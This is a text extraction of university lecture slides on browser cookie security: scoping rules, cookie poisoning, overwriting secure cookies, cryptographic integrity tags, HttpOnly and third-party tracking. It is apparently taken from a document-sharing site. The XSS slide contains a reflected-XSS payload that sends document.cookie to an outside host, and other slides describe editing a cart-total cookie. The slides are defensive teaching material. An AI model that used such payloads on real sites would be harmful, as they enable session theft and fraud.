《10cookiesecurity.ppt》由会员分享,可在线阅读,更多相关《10cookiesecurity.ppt(29页珍藏版)》请在三一办公上搜索。
1、Cookie Same Origin Policy,Dan Boneh,CS 142,Winter 2009,Monday:session management using cookies,Same origin policy:“high level”,Review:Same Origin Policy(SOP)for DOM:Origin A can access origin Bs DOM if match on(scheme,domain,port)Today:Same Original Policy(SOP)for cookies:Generally speaking,based on
2、:(scheme,domain,path),scheme:/domain:port/path?params,Setting/deleting cookies by server,Delete cookie by setting“expires”to date in pastDefault scope is domain and path of setting URL,Browser,Server,GET,HTTP Header:Set-cookie:NAME=VALUE;domain=(when to send);path=(when to send)secure=(only send ove
3、r SSL);expires=(when expires);HttpOnly(later),if expires=NULL:this session only,Scope setting rules(write SOP),domain:any domain-suffix of URL-hostname,except TLDexample:host=“”can set cookies for all of but not for another site or TLDProblematic for sites like.stanford.edupath:can be set to anythin
4、g,allowed,disallowed,Cookies are identified by(name,domain,path),Both cookies stored in browsers cookie jar;both are in scope of,cookie 1name=useridvalue=testdomain=path=/secure,cookie 2name=useridvalue=test123domain=path=/secure,distinct cookies,Reading cookies on server(read SOP),Browser sends all
5、 cookies in URL scope:cookie-domain is domain-suffix of URL-domain,andcookie-path is prefix of URL-path,andprotocol=HTTPS if cookie is“secure”Goal:server only sees cookies in its scope,Server,GET/URL-domain/URL-pathCookie:NAME=VALUE,Examples,http:/,cookie 1name=useridvalue=u1domain=path=/secure,cook
6、ie 2name=useridvalue=u2domain=path=/non-secure,both set by,cookie:userid=u2cookie:userid=u2cookie:userid=u1;userid=u2,(arbitrary order),Client side read/write:document.cookie,Setting a cookie in Javascript:document.cookie=“name=value;expires=;”Reading a cookie:alert(document.cookie)prints string con
7、taining all cookies available for document(based on protocol,domain,path)Deleting a cookie:document.cookie=“name=;expires=Thu,01-Jan-70”,document.cookie often used to customize page in Javascript,javascript:alert(document.cookie),Javascript URL,Displays all cookies for current document,Viewing/delet
8、ing cookies in Browser UI,Cookie protocol problems,Server is blind:Does not see cookie attributes(e.g.secure)Does not see which domain set the cookie,Server only sees:Cookie:NAME=VALUE,Example 1:login server problems,Alice logs in at sets session-id cookie for Alice visits overwrites session-id cook
9、iewith session-id of user“badguy”Alice visits to submit thinks it is talking to“badguy”Problem:cs142hw expects session-id from;cannot tell that session-id cookie was overwritten,Example 2:“secure”cookies are not secure,Alice logs in at https:/visits http:/(cleartext)Network attacker can inject into
10、responseSet-Cookie:LSID=badguy;secureand overwrite secure cookieProblem:network attacker can re-write HTTPS cookies!HTTPS cookie value cannot be trusted,Interaction with the DOM SOP,Cookie SOP:path separation does not see cookies of a security measure:DOM SOP:has access to DOM of separation is done
11、for efficiency not security:is only sent the cookies it needs,Cookies have no integrity!,Storing security data on browser?,User can change and delete cookie values!Edit cookie file(FF3:cookies.sqlite)Modify Cookie header(FF:TamperData extension)Silly example:shopping cart software Set-cookie:shoppin
12、g-cart-total=150($)User edits cookie file(cookie poisoning):Cookie:shopping-cart-total=15($)Similar to problem with hidden fields,16,17,Not so silly(as of 2/2000),D3.COM Pty Ltd:ShopFactory 5.8Retail Corporation:RetailAdgrafix:Check It OutBaron Consulting Group:WebSite Tool ComCity Corporation:Sales
13、CartCrested Butte Software:EasyCartD:Dansie Shopping CartIntelligent Vending Systems:IntellivendMake-a-Store:Make-a-Store OrderPageMcMurtrey/Whitaker&Associates:Cart32 3.0 pknutsennethut.no:CartMan 1.04 Rich Media Technologies:JustAddCommerce 5.0 SmartCart:SmartCartWeb Express:Shoptron 1.2,Source:ht
14、tp:/,Solution:cryptographic checksums,“value”should also contain data to prevent cookie replay and swap,Goal:data integrityRequires secret key k unknown to browser,Server,k,Generate tag:T F(k,value),19,Example:.NET 2.0,System.Web.Configuration.MachineKey Secret web server key intended for cookie pro
15、tectionStored on all web servers in siteCreating an encrypted cookie with integrity:HttpCookie cookie=new HttpCookie(name,val);HttpCookie encodedCookie=HttpSecureCookie.Encode(cookie);Decrypting and validating an encrypted cookie:HttpSecureCookie.Decode(cookie);,Cookie theft:basic cross site scripti
16、ng(XSS),Example:reflected XSS,search field on:http:/?term=appleServer-side implementation of search.php:Search Results Results for:.,Bad input,Consider link:(properly URL encoded)http:/?term=window.open(“http:/?cookie=”+document.cookie)What if user clicks on this link?Browser goes to returns Results
17、 for Browser executes script:Sends cookie for,23,So what?,Why would user click on such a link?Phishing emailLink in doubleclick banner ad many many ways to fool user into clickingMANY other forms of XSS(monday)Many do not require clicking on links,HttpOnly Cookies IE6 SP1,FF2.0.0.5,Browser,Server,GE
18、T,HTTP Header:Set-cookie:NAME=VALUE;HttpOnly,Cookie sent over HTTP(s),but not accessible to scripts cannot be read via document.cookie Also blocks access from XMLHttpRequest headers Helps prevent cookie theft via XSS but does not stop most other risks of XSS bugs.,(not Safari),THE END,3rd Party Cook
19、ies:user tracking,3rd party cookies,What they are:User goes to site A.com;obtains pagePage contains Browser goes to B.com;obtains pageHTTP response contains cookieCookie from B.com is called a 3rd party cookieTracking:User goes to site D.comD.com contains B.com obtains cookie set when visited A.com
20、B.com knows user visited A.com and D.com,Can we block 3rd party cookies?,IE and Safari:block set/writeIgnore the“Set-Cookie”HTTP header from 3rd parties Site sets cookie as a 1st party;will be given cookie when contacted as a 3rd partyEnabled by default in IE7Firefox and Opera:block send/readAlways
21、implement“Set-Cookie”,but never send cookies to 3rd partyBreaks sess.mgmt.at several sites(off by default),Effectiveness of 3rd party blocking,Ineffective for improving privacy3rd party can become first party and then set cookieFlash cookies not controlled by browser cookie policyIE8 InPrivate browsing and Chrome incognitoUpon exit,delete all browser state collected while in private browsing,